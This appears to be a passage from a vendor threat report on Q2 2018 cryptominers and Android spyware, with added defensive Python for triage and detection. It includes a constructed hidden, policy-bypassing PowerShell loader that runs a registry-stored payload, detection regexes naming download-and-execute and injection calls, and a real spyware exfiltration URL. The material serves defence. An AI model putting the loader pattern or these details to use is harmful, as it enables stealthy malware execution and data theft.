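Added example, not Comodo's tooling and not the BadShell sample itself.
SAMPLE_SCRIPT and SAMPLE_CMDLINE are constructed; the registry path and
value name inside them are placeholders, not indicators from the case.
"""
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand ("-e", "-enc", ...)
# plus "-ec";  the argument is Base64 of the script encoded as UTF-16LE.
_ENC_FLAG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
_HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

# Traits of a script whose job is to pull a payload out of the registry and run it.
INDICATORS = {
    "registry_payload": re.compile(r"Get-ItemProperty|\.GetValue\(|HKCU:|HKLM:|Registry::", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "in_memory_load": re.compile(r"Reflection\.Assembly\]::Load|VirtualAlloc|CreateRemoteThread", re.I),
    "downloader": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind -EncodedCommand, or None if there is none."""
    for match in _ENC_FLAG.finditer(cmdline):
        flag, blob = match.group(1).lower(), match.group(2)
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # some other -e... switch, e.g. -ExecutionPolicy
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def triage_task_action(cmdline: str) -> Dict[str, object]:
    """Decode the task's PowerShell action and list the suspicious traits found."""
    script = decode_encoded_command(cmdline)
    hits: List[str] = []
    if _HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden_window")
    if script is not None:
        hits.append("encoded_command")
        hits.extend(name for name, rx in INDICATORS.items() if rx.search(script))
    return {"script": script, "indicators": sorted(hits)}


# Constructed sample: what a BadShell-style task action might look like. The
# script is encoded here exactly the way PowerShell expects it on the command line.
SAMPLE_SCRIPT = (
    "$d = (Get-ItemProperty -Path 'HKCU:\\Software\\Example\\Cfg' -Name 'blob').blob;"
    "$b = [Convert]::FromBase64String($d);"
    "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, $null)"
)
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

if __name__ == "__main__":
    result = triage_task_action(SAMPLE_CMDLINE)
    print(result["indicators"])
    print(result["script"])
```

Fed with the Arguments field of every scheduled task action on a host (or with the command lines from process-creation events), the same function turns the manual decode shown in the screenshots into a hunt that scales across an estate.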
This emergency clearly demonstrates how dangerous cryptominer activity can be. Imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to do their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but the company's financial losses were of course irreversible.

Invulnerability to antivirus software and persistence in the system are the most important attributes of a cryptominer, because the longer it runs on the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.

Below is another cunning technique that turns an infected machine into the attacker's slave.
3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency for cybercriminals. But it has a special feature: it roots itself into the system so deeply that it becomes unremovable. Attempting to kill it will kill the target system.

The secret of WinstarNssmMiner's persistence lies in the way it infects a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes carry the "critical process" attribute, meaning that terminating either of them will crash the system and leave the user with a blue screen. For responders this changes the playbook: the flag (ProcessBreakOnTermination, set through NtSetInformationProcess or its wrapper RtlSetProcessIsCritical, which requires SeDebugPrivilege) makes "kill the process" the wrong first move. Remove the persistence mechanism and the source of the injected code first, then either clear the flag through the same API from a tool holding SeDebugPrivilege or take the host down for an offline clean, and only then let the processes go.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only the victim's system but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads the CoinMiner build for the Windows architecture (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks whether a miner is already running

The malware maintains two lists, named $malwares and $malwares2, holding the names of the processes it is instructed to kill. The lists include other kinds of cryptominers.

In this way CoinMiner takes sole possession of the victim's computer and uses its resources for mining cryptocurrency. For defenders the kill list is also a detection opportunity: a PowerShell script that enumerates processes and terminates a hard-coded list of miner names is itself a strong indicator, and the "AMDDriver64" process name (chosen to look like a driver component) is worth a process-name hunt on its own.
Some cryptominers earned the spotlight of the mass media and of cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide, and CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your web page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on the subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. In the second quarter, perpetrators found a way around this obstacle: they now camouflage CoinHive's presence with URL shorteners.
As a result, the malicious code on a web page looks like this:

The obfuscated malicious code on a web page

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1, to make it as close to invisible as possible.

Now let's look at the URL https://cnhv.co

And there we find the familiar link to CoinHive.

The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the web page's code but finds no sign of a cryptominer. So she concludes that something has gone wrong with her PC, while CoinHive keeps co-opting her computer to mine cryptocoins.
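One way to make the camouflage described above visible again, as an added example (not Comodo's code): decode the atob() payloads a page writes into itself and list any iframe that either points at a known miner host or is sized to a single pixel. The page, the hidden snippet and the shortlink path are constructed here; the only real names are the two CoinHive domains, coinhive.com and its cnhv.co shortlink service, which the report itself points to.

```python
"""Find miner iframes hidden behind Base64 in a page's inline JavaScript.

Added example, not Comodo's tooling. The page below is constructed; the
shortlink path is a placeholder. coinhive.com and cnhv.co are the miner's
own domains (cnhv.co being the CoinHive shortlink service named above).
"""
import base64
import re
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlparse

MINER_HOSTS = {"coinhive.com", "cnhv.co"}
# atob("...") is how the obfuscated snippet turns its Base64 string back into HTML.
ATOB_ARG = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in a fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.iframes: List[Dict[str, str]] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag.lower() == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _pixels(value: str) -> int:
    """Parse "1" or "1px"; anything unparsable counts as large (not hidden)."""
    digits = re.match(r"\s*(\d+)", value or "")
    return int(digits.group(1)) if digits else 10_000


def decoded_fragments(html: str) -> List[str]:
    """The page itself plus every atob() payload it would write at runtime."""
    out = [html]
    for blob in ATOB_ARG.findall(html):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    return out


def suspicious_iframes(html: str) -> List[Dict[str, object]]:
    """Iframes that load a known miner host or are shrunk to a single pixel."""
    found: List[Dict[str, object]] = []
    for fragment in decoded_fragments(html):
        collector = IframeCollector()
        collector.feed(fragment)
        for frame in collector.iframes:
            src = frame.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            tiny = _pixels(frame.get("width", "")) <= 1 and _pixels(frame.get("height", "")) <= 1
            known = host in MINER_HOSTS
            if known or tiny:
                found.append({"src": src, "host": host, "tiny": tiny, "known_miner": known})
    return found


# Constructed page: a 1x1 iframe to the shortlink, hidden inside a Base64 string.
HIDDEN_SNIPPET = '<iframe src="https://cnhv.co/placeholder" width="1" height="1"></iframe>'
SAMPLE_PAGE = (
    "<html><body><h1>Latest news</h1>"
    "<script>document.write(atob('%s'));</script>"
    "</body></html>" % base64.b64encode(HIDDEN_SNIPPET.encode()).decode()
)

if __name__ == "__main__":
    for hit in suspicious_iframes(SAMPLE_PAGE):
        print(hit)
```

The "tiny" rule matters as much as the host list: once a shortener or a fresh domain is in play the host set is stale, but an iframe the page deliberately shrinks to one pixel has no honest reason to exist and deserves a look regardless of where it points.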
The next piece of malware in our lineup prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief than a cryptominer, because it does not devour an infected machine's resources but actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. On finding one, it swaps it for the address of a wallet under the attacker's control, so the unaware owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.

A new cryptocurrency clipboard hijacker sample can monitor 2,343,286 addresses

This malware is distributed bundled with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread several types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
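A defensive counterpart to the swap shown above, added here as an example and not taken from the report: a Base58Check validator for Bitcoin addresses plus a small clipboard monitor that raises an alert when a valid address the user copied is replaced by a different address-shaped string without a user copy action in between. The event stream (who changed the clipboard, user or system) is a simulation of what a clipboard-viewer hook would deliver; the demo input uses the well-known genesis-block address and the attacker address quoted above.

```python
"""Validate Bitcoin addresses and flag clipboard swaps of the kind described above.

Added example, not from the report. The clipboard event stream is simulated:
("user", text) is a copy the user made, ("system", text) is a clipboard change
that arrived without a user copy, which is what a hijacker's rewrite looks like
to a clipboard-viewer hook.
"""
import hashlib
import re
from typing import List, Optional, Sequence, Tuple

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy (1..., 3...) and bech32 (bc1...) shapes; enough to spot an address-like string.
ADDRESS_SHAPE = re.compile(r"^(?:[13][1-9A-HJ-NP-Za-km-z]{25,34}|bc1[02-9ac-hj-np-z]{11,71})$")


def b58decode(text: str) -> bytes:
    """Decode Base58; each leading '1' stands for one zero byte."""
    number = 0
    for ch in text:
        index = B58_ALPHABET.find(ch)
        if index < 0:
            raise ValueError("not a Base58 string")
        number = number * 58 + index
    body = number.to_bytes((number.bit_length() + 7) // 8, "big") if number else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def is_valid_btc_address(text: str) -> bool:
    """Base58Check: version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    try:
        raw = b58decode(text)
    except ValueError:
        return False
    if len(raw) != 25 or raw[0] not in (0x00, 0x05):  # mainnet P2PKH / P2SH
        return False
    checksum = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4]
    return checksum == raw[21:]


def clipboard_guard(events: Sequence[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (copied, replaced_with) pairs where a valid address the user copied
    was overwritten by a different address-shaped value without a user copy."""
    alerts: List[Tuple[str, str]] = []
    user_copied: Optional[str] = None
    for actor, text in events:
        if actor == "user":
            user_copied = text if is_valid_btc_address(text) else None
        elif actor == "system" and user_copied and text != user_copied and ADDRESS_SHAPE.match(text):
            alerts.append((user_copied, text))
            user_copied = None
    return alerts


# Demo input: the genesis-block address (known valid) is copied, then the
# clipboard changes on its own to the attacker address quoted in the report.
GENESIS_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
REPORTED_ATTACKER_ADDRESS = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"
DEMO_EVENTS = [("user", GENESIS_ADDRESS), ("system", REPORTED_ATTACKER_ADDRESS)]

if __name__ == "__main__":
    print(is_valid_btc_address(GENESIS_ADDRESS))
    for copied, swapped in clipboard_guard(DEMO_EVENTS):
        print("clipboard swap:", copied, "->", swapped)
```

The checksum check is what makes the guard quiet on ordinary text: only a string that really decodes as an address arms it, and only an address-shaped replacement that arrives without a keypress fires it. The same comparison belongs in any wallet front end as a last line of defence: show the pasted address next to the one the user expects and ask for confirmation when they differ.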
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in number, they are coming back in updated disguises and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the contents of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking their partners' every move and parents wanting to control their children, and it is easy to understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts (id, name, phone numbers and email address of the owner), grabs SMS messages and associated information, and attempts to read call logs (number, name, type, duration), emails (email type) and the photos of contacts. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server at http://cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads the recording to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly tracked all events on the infected device. Social networks were another means of distributing the malware.

Version 1: Dardesh, Google Play Services, Instant Apps
Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. This capability set resembles that of spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts their metadata and makes changes on the victim's device.
4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has four different versions:

Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

- Enable and disable GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about installed applications
- Collect browser data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:

- Extracts photos, audio and video
- Records the screen
- Executes shell commands
- Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend it brings a bundle of malicious abilities:

- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message database and the related keys
- Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with a targeted hunt for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.

Versions 1 to 3: Facebook, Chrome

Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:

- Extract the device information
- Delete SMS
- Set the ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Keep Wi-Fi always turned on

Version 2 can execute additional commands:

- Send SMS and read outgoing SMS
- Enable and disable the Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy

The next piece of malware in our lineup is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.

App distribution: FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware feature set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the LokiBot Android banker. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption it deletes the original files. So we can call it a spy with a "007 licence".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
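The command names above are also useful on the defensive side: seen in proxy, MDM or sandbox logs, they identify the bot and tell the analyst what it has been instructed to do. The Python script below is an added example and not code from the report; it scans device-to-C&C log lines for the Mystery Bot command names listed above and flags any device that has issued two or more distinct commands. The log format, the device identifiers and the sample lines are constructed for this example; the behaviour labels paraphrase the report's own descriptions of each command.

```python
import re
from collections import defaultdict

# Command names as listed in the report for Mystery Bot, each paired with a
# short behaviour label (paraphrasing the report) for analyst-facing output.
MYSTERYBOT_COMMANDS = {
    "Send_SMS": "SMS exfiltration",
    "Send_USSD": "USSD exfiltration",
    "Gethistory": "browser history monitoring",
    "Start_AllApp": "installed-app enumeration",
    "Send_call": "outgoing call",
    "Forward_call": "call forwarding",
    "ResForward_call": "call forwarding reset",
    "Go_Smsmnd": "SMS deletion",
    "Go_GetAlls": "SMS history theft",
    "Dell_sms": "SMS conversation deletion",
    "Send_spam": "spam SMS sending",
    "Start_Inject": "overlay injection",
}

# Whole-token, case-insensitive match: the lookarounds stop "Send_SMS" from
# firing inside an unrelated identifier. Longest names go first so that
# "ResForward_call" wins over "Forward_call" when both could match.
_PATTERN = re.compile(
    r"(?<![A-Za-z0-9_])("
    + "|".join(re.escape(c) for c in sorted(MYSTERYBOT_COMMANDS, key=len, reverse=True))
    + r")(?![A-Za-z0-9_])",
    re.IGNORECASE,
)
_CANONICAL = {c.lower(): c for c in MYSTERYBOT_COMMANDS}

# Constructed sample log (not real traffic); one record per line:
# "<timestamp> <device-id> <direction> <payload>"
SAMPLE_LOG = """\
2018-05-02T09:14:01Z dev-a1 rx cmd=Send_SMS;to=upload
2018-05-02T09:14:05Z dev-a1 rx cmd=go_getalls
2018-05-02T09:15:11Z dev-b7 rx cmd=Gethistory
2018-05-02T09:16:40Z dev-c3 tx status=ok;note=resend_smsgateway
2018-05-02T09:17:02Z dev-a1 rx cmd=Start_Inject;target=bank
2018-05-02T09:18:30Z dev-b7 rx cmd=ResForward_call
"""


def extract_commands(text):
    """Return the canonical Mystery Bot command names found in one payload."""
    return [_CANONICAL[m.group(1).lower()] for m in _PATTERN.finditer(text)]


def triage(log_text, min_distinct=2):
    """Group command hits per device and flag devices that issued at least
    min_distinct distinct commands. Returns a dict keyed by device id."""
    per_device = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue  # malformed record; skip rather than guess
        _ts, device, _direction, payload = parts
        per_device[device].update(extract_commands(payload))
    report = {}
    for device, cmds in per_device.items():
        ordered = sorted(cmds)
        report[device] = {
            "commands": ordered,
            "behaviours": [MYSTERYBOT_COMMANDS[c] for c in ordered],
            "flagged": len(cmds) >= min_distinct,
        }
    return report


if __name__ == "__main__":
    for device, info in triage(SAMPLE_LOG).items():
        flag = "FLAG" if info["flagged"] else "    "
        print(f"{flag} {device}: {', '.join(info['behaviours']) or '-'}")
```

The whole-token match is what keeps `resend_smsgateway` on the dev-c3 line quiet while the lowercase `go_getalls` still resolves to `Go_GetAlls`. In practice this vocabulary would be one indicator among several, since a bare token match will also hit analysts' own notes or test data, and a real deployment would key on the C&C host as well.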
4.1.7 FakeSpy
FakeSpy also has many masks, as you can see in the screenshot.
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email ID
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple “spy legends” to gain users’ trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtproto زیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Noticeably, it is sold in three options: bronze, silver and gold.
After infiltrating a victim’s device, Hero Rat shows a warning like “app can’t be run”. But it runs in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes the infected device to WAP and SMS services to add extra charges to the owner’s mobile bill. Once installed, this malware displays a fake notification with a “skip option”. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive
The last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them upgrading its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via… another cryptominer named CoinMiner.
How is this possible? Let’s imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims’ machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
[Chart: Android-targeted malware in April]
4.2.2 May 2018
[Chart: Android-targeted malware in May]
4.2.3 June 2018
[Chart: Android-targeted malware in June]
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called “Strategic Threat” due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world’s most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A “Net Worm” typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a “multi-threaded polymorphic” worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or “peers”) that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a “memory resident” virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK’s Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
